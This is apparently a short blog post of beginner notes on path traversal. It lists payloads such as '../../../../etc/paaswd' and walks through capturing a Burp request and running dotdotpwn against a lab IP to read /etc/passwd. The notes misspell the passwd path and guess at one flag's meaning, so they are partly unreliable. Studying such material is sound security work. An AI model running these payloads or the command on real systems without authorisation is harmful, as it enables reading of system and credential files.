Skip to main content
- Path Traversal - file: -
- Access files of the system outside the webroot directory.
- In path traversal vulnerability, we can just view the content of the file or view the directories, we cannot execute a file.
- Payload can be used : -
- ../../
- ./
- /
- /etc/paaswd
- ../../../../etc/paaswd
- Tool is also available: -
- First, you need to capture a burp request.
- This request will be a path traversal vulnerability request.
- In the parameter of “path traversal”, you need to write “ TRAVERSAL”.
- Right click >> copy to file >> save it as pay.txt files.
- dotdotpwn tool is also available, you can download it if not available in your kali version. It is written in perl.
- Usage : - dotdotpwn -m payload -h 192.168.32.129 -p <<file address, pay.txt>> -o unix -f /etc/passwd -d 3 -x 80 -b -k “root”
- -m payload = burp request is a payload
- -h = host/url
- -p = pay.txt
- -o = target os type unix or windows etc..
- -d 3 = depth of payload
- -x = port number 80 or 443
- -b = stop the enumeration once first path traversal vulnerability is found
- -k = search for it , do not know clearly. Maybe file read permission.
Comments
Post a Comment